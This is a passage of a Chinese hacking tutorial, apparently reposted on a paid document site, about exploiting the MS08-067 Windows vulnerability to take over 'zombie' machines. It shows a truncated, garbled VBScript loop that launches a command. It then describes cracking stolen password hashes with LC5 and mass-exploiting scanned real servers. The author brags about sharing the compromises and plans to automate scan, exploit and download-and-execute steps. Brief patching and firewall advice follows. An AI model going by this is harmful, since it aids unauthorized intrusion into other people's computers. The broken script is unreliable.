利用MS08067远程溢出漏洞抓肉鸡 - 图文

2026/4/29 9:09:13

on error resume next set arg=wscript.arguments If arg.count=0 then wscript.echo \sleep 1000 wscript.quit End If Tport=arg(0) Runs=false While runs=false Dim oShell,oExec,strOut,oRegExp,Matches,Match,Num,Tport Set oShell = WScript.CreateObject(\Set oExec = oShell.Exec(\Set oRegExp = new RegExp oRegExp.Pattern = \oRegExp.IgnoreCase = True oRegExp.Global = True Do While Not oExec.StdOut.AtEndOfStream strOut = strOut & oExec.StdOut.ReadLine() & Chr(13) & Chr(10) Loop Set Matches = oRegExp.Execute(strOut) Num = 0 For Each Match In Matches Num = Num + 1 Next if num > 1 then Runs=true oShell.run \end if Set Matches = Nothing Set oRegExp = Nothing Set oExec = Nothing Set oShell = Nothing Wend 11.破解Hash值

这个俺就不多说了。直接使用LC5导入即可,要是还不会的,请关注本团队的一系列研究结果。破解Hash值的好处就是以后使用管理员的帐号和密码进行登录,当然还可以以防万一!

12.继续溢出和推广使用方法

测试成功后,呵呵继续对扫描出来的结果进行了溢出,毫无疑问,Windows XP、Window 2000 Server、Windows 2000 Professional以及Windows2003 Server均可成功溢出,如图12所示,溢出一台Windows 2000 Server。呵呵,好东西就应该跟大家分享,俺溢出成功后,就跟俺的好友们共享这个成功的溢出过程。

图12 继续溢出其它类型服务器 (三)防范措施

1.安装360卫士和升级系统补丁

首先就是升级系统补丁,推荐使用360卫士,使用其扫描即可,发现问题纠正问题即可。还有就是要及时升级360卫生的版本,在实际溢出过程中,我发现很多服务器上都安装了杀毒软件以及360卫士,但是其版本太低,未及时更新补丁程序,失去了应有的防范能力。

2.安装防火墙

在本次溢出过程中,我们还发现存在防火墙的情况下,成功溢出的几率几乎为0,因此推荐在系统中安装防火墙,对内外网防范都有效。

(四)总结与体会

本次测试几乎是在要放弃的情况下,偶是先进行了MS08067漏洞的本地测试,一个都没有成功,都想放弃了,后面打算放到实际环境中进行测试,未想一炮打响,再后来有一些改进的思路,偶做了录像,具体可以看录像,本人觉得可以将其修改跟1433自动抓肉鸡那个工具一样,自动扫描,自动溢出,自动执行下载程序,安全总在思维的突破!

【51CTO.COM 独家特稿,转载请注明出处及作者!】 【编辑推荐】


利用MS08067远程溢出漏洞抓肉鸡 - 图文.doc 将本文的Word文档下载到电脑
搜索更多关于: 利用MS08067远程溢出漏洞抓肉鸡 - 图文 的文档
相关推荐
相关阅读
× 游客快捷下载通道(下载后可以自由复制和排版)

下载本文档需要支付 10

支付方式:

开通VIP包月会员 特价:29元/月

注:下载文档有可能“只有目录或者内容不全”等情况,请下载之前注意辨别,如果您已付费且无法下载或内容有问题,请联系我们协助你处理。
微信:xuecool-com QQ:370150219